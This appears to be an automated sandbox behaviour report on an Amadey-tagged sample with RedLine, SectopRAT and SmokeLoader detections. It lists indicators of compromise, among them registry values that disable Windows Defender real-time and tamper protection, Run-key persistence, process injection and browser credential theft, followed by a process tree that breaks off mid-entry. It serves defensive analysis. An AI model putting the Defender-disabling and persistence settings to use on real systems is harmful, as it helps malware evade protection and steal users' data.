amadey | e02c27422d258451e589e008618887d4f37c72725d6ed2a30857de7b40643e0c

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	638B.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	638B.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	638B.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	638B.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	638B.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	638B.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 14 IoCs

resource	yara_rule
behavioral2/memory/4396-41-0x0000000000400000-0x000000000043E000-memory.dmp	family_redline
behavioral2/files/0x000c00000002321a-47.dat	family_redline
behavioral2/files/0x000c00000002321a-48.dat	family_redline
behavioral2/memory/3320-50-0x00000000005E0000-0x000000000063A000-memory.dmp	family_redline
behavioral2/memory/3664-61-0x0000000002070000-0x00000000020CA000-memory.dmp	family_redline
behavioral2/files/0x0007000000023229-71.dat	family_redline
behavioral2/files/0x0007000000023229-72.dat	family_redline
behavioral2/memory/5100-80-0x0000000000400000-0x000000000043E000-memory.dmp	family_redline
behavioral2/memory/2520-92-0x0000000000F30000-0x0000000001088000-memory.dmp	family_redline
behavioral2/files/0x0006000000023235-119.dat	family_redline
behavioral2/files/0x0006000000023235-120.dat	family_redline
behavioral2/memory/1976-165-0x0000000000960000-0x000000000097E000-memory.dmp	family_redline
behavioral2/memory/2440-168-0x00000000005A0000-0x00000000005FA000-memory.dmp	family_redline
behavioral2/memory/4700-166-0x0000000000A50000-0x0000000000A8E000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 3 IoCs

resource	yara_rule
behavioral2/files/0x000c00000002321a-47.dat	family_sectoprat
behavioral2/files/0x000c00000002321a-48.dat	family_sectoprat
behavioral2/memory/1976-165-0x0000000000960000-0x000000000097E000-memory.dmp	family_sectoprat

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Downloads MZ/PE file

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	6707.exe
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	explothe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	7020.exe
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	oneetx.exe

Executes dropped EXE 23 IoCs

pid	Process
3236	488D.exe
3652	4A92.exe
4432	5590.exe
1796	638B.exe
4620	6707.exe
3580	7020.exe
3320	75BF.exe
1976	7C48.exe
2520	809E.exe
3664	8959.exe
2440	8C58.exe
2980	kR0FT1Jx.exe
2768	Mu5Wf7sk.exe
2784	sT1If0nH.exe
4736	vw0yB1JC.exe
3448	1hL00GO3.exe
4700	2va650IA.exe
4592	explothe.exe
5380	oneetx.exe
3172	oneetx.exe
1936	explothe.exe
2800	vcuasga
5300	vcuasga

Loads dropped DLL 1 IoCs

pid	Process
6056	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	638B.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	488D.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	kR0FT1Jx.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	Mu5Wf7sk.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	sT1If0nH.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	vw0yB1JC.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Detected potential entity reuse from brand microsoft.
phishing microsoft

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3492 set thread context of 2768	3492	e02c27422d258451e589e008618887d4f37c72725d6ed2a30857de7b40643e0c.exe	90
PID 4432 set thread context of 4396	4432	5590.exe	112
PID 2520 set thread context of 5100	2520	809E.exe	125

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
4332	3492	WerFault.exe	85
3588	4432	WerFault.exe	106

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
5212	schtasks.exe
5800	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2768	AppLaunch.exe
2768	AppLaunch.exe
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found
3160	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3160	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2768	AppLaunch.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

pid	Process
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeDebugPrivilege	1796	638B.exe
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found
Token: SeCreatePagefilePrivilege	3160	Process not Found
Token: SeShutdownPrivilege	3160	Process not Found

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3580	7020.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe
3636	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3492 wrote to memory of 2768	3492	e02c27422d258451e589e008618887d4f37c72725d6ed2a30857de7b40643e0c.exe	90
PID 3492 wrote to memory of 2768	3492	e02c27422d258451e589e008618887d4f37c72725d6ed2a30857de7b40643e0c.exe	90
PID 3492 wrote to memory of 2768	3492	e02c27422d258451e589e008618887d4f37c72725d6ed2a30857de7b40643e0c.exe	90
PID 3492 wrote to memory of 2768	3492	e02c27422d258451e589e008618887d4f37c72725d6ed2a30857de7b40643e0c.exe	90
PID 3492 wrote to memory of 2768	3492	e02c27422d258451e589e008618887d4f37c72725d6ed2a30857de7b40643e0c.exe	90
PID 3492 wrote to memory of 2768	3492	e02c27422d258451e589e008618887d4f37c72725d6ed2a30857de7b40643e0c.exe	90
PID 3160 wrote to memory of 3236	3160	Process not Found	102
PID 3160 wrote to memory of 3236	3160	Process not Found	102
PID 3160 wrote to memory of 3236	3160	Process not Found	102
PID 3160 wrote to memory of 3652	3160	Process not Found	103
PID 3160 wrote to memory of 3652	3160	Process not Found	103
PID 3160 wrote to memory of 3652	3160	Process not Found	103
PID 3160 wrote to memory of 4448	3160	Process not Found	104
PID 3160 wrote to memory of 4448	3160	Process not Found	104
PID 3160 wrote to memory of 4432	3160	Process not Found	106
PID 3160 wrote to memory of 4432	3160	Process not Found	106
PID 3160 wrote to memory of 4432	3160	Process not Found	106
PID 3160 wrote to memory of 1796	3160	Process not Found	108
PID 3160 wrote to memory of 1796	3160	Process not Found	108
PID 3160 wrote to memory of 4620	3160	Process not Found	109
PID 3160 wrote to memory of 4620	3160	Process not Found	109
PID 3160 wrote to memory of 4620	3160	Process not Found	109
PID 3160 wrote to memory of 3580	3160	Process not Found	110
PID 3160 wrote to memory of 3580	3160	Process not Found	110
PID 3160 wrote to memory of 3580	3160	Process not Found	110
PID 4448 wrote to memory of 4920	4448	cmd.exe	111
PID 4448 wrote to memory of 4920	4448	cmd.exe	111
PID 4432 wrote to memory of 4396	4432	5590.exe	112
PID 4432 wrote to memory of 4396	4432	5590.exe	112
PID 4432 wrote to memory of 4396	4432	5590.exe	112
PID 4432 wrote to memory of 4396	4432	5590.exe	112
PID 4432 wrote to memory of 4396	4432	5590.exe	112
PID 4432 wrote to memory of 4396	4432	5590.exe	112
PID 4432 wrote to memory of 4396	4432	5590.exe	112
PID 4432 wrote to memory of 4396	4432	5590.exe	112
PID 3160 wrote to memory of 3320	3160	Process not Found	115
PID 3160 wrote to memory of 3320	3160	Process not Found	115
PID 3160 wrote to memory of 3320	3160	Process not Found	115
PID 3160 wrote to memory of 1976	3160	Process not Found	118
PID 3160 wrote to memory of 1976	3160	Process not Found	118
PID 3160 wrote to memory of 1976	3160	Process not Found	118
PID 3160 wrote to memory of 2520	3160	Process not Found	120
PID 3160 wrote to memory of 2520	3160	Process not Found	120
PID 3160 wrote to memory of 2520	3160	Process not Found	120
PID 3160 wrote to memory of 3664	3160	Process not Found	122
PID 3160 wrote to memory of 3664	3160	Process not Found	122
PID 3160 wrote to memory of 3664	3160	Process not Found	122
PID 3160 wrote to memory of 2440	3160	Process not Found	124
PID 3160 wrote to memory of 2440	3160	Process not Found	124
PID 3160 wrote to memory of 2440	3160	Process not Found	124
PID 3236 wrote to memory of 2980	3236	488D.exe	126
PID 3236 wrote to memory of 2980	3236	488D.exe	126
PID 3236 wrote to memory of 2980	3236	488D.exe	126
PID 2520 wrote to memory of 5100	2520	809E.exe	125
PID 2520 wrote to memory of 5100	2520	809E.exe	125
PID 2520 wrote to memory of 5100	2520	809E.exe	125
PID 2520 wrote to memory of 5100	2520	809E.exe	125
PID 2980 wrote to memory of 2768	2980	kR0FT1Jx.exe	128
PID 2980 wrote to memory of 2768	2980	kR0FT1Jx.exe	128
PID 2980 wrote to memory of 2768	2980	kR0FT1Jx.exe	128
PID 4448 wrote to memory of 3636	4448	cmd.exe	127
PID 4448 wrote to memory of 3636	4448	cmd.exe	127
PID 2520 wrote to memory of 5100	2520	809E.exe	125
PID 3636 wrote to memory of 4764	3636	msedge.exe	129

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\e02c27422d258451e589e008618887d4f37c72725d6ed2a30857de7b40643e0c.exe
"C:\Users\Admin\AppData\Local\Temp\e02c27422d258451e589e008618887d4f37c72725d6ed2a30857de7b40643e0c.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3492
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  - DcRat
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:2768
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 292
  2⤵
  - Program crash
  PID:4332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3492 -ip 3492
1⤵
PID:5108

C:\Users\Admin\AppData\Local\Temp\488D.exe
C:\Users\Admin\AppData\Local\Temp\488D.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3236
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\kR0FT1Jx.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\kR0FT1Jx.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2980
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Mu5Wf7sk.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Mu5Wf7sk.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:2768
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sT1If0nH.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sT1If0nH.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:2784
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\vw0yB1JC.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\vw0yB1JC.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:4736
      - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hL00GO3.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1hL00GO3.exe
        6⤵
        Executes dropped EXE
        
        PID:3448
      - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2va650IA.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2va650IA.exe
        6⤵
        Executes dropped EXE
        
        PID:4700

C:\Users\Admin\AppData\Local\Temp\4A92.exe
C:\Users\Admin\AppData\Local\Temp\4A92.exe
1⤵
- Executes dropped EXE
PID:3652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\51A7.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:4448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
  2⤵
  PID:4920
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9bd8146f8,0x7ff9bd814708,0x7ff9bd814718
    3⤵
    PID:3644
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,4089377247983401469,4955417834191912175,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
    3⤵
    PID:3924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:3636
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9bd8146f8,0x7ff9bd814708,0x7ff9bd814718
    3⤵
    PID:4764
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16340348674855126687,6710257796245653226,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2768 /prefetch:1
    3⤵
    PID:4332
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16340348674855126687,6710257796245653226,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2860 /prefetch:1
    3⤵
    PID:4476
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,16340348674855126687,6710257796245653226,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3040 /prefetch:8
    3⤵
    PID:4676
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,16340348674855126687,6710257796245653226,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3028 /prefetch:3
    3⤵
    PID:4852
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,16340348674855126687,6710257796245653226,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2984 /prefetch:2
    3⤵
    PID:4696
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16340348674855126687,6710257796245653226,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:1
    3⤵
    PID:1616
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16340348674855126687,6710257796245653226,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4604 /prefetch:1
    3⤵
    PID:4520
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16340348674855126687,6710257796245653226,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4596 /prefetch:1
    3⤵
    PID:4132
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16340348674855126687,6710257796245653226,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
    3⤵
    PID:4028
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16340348674855126687,6710257796245653226,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
    3⤵
    PID:5400
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16340348674855126687,6710257796245653226,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
    3⤵
    PID:5656
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,16340348674855126687,6710257796245653226,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
    3⤵
    PID:6052
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
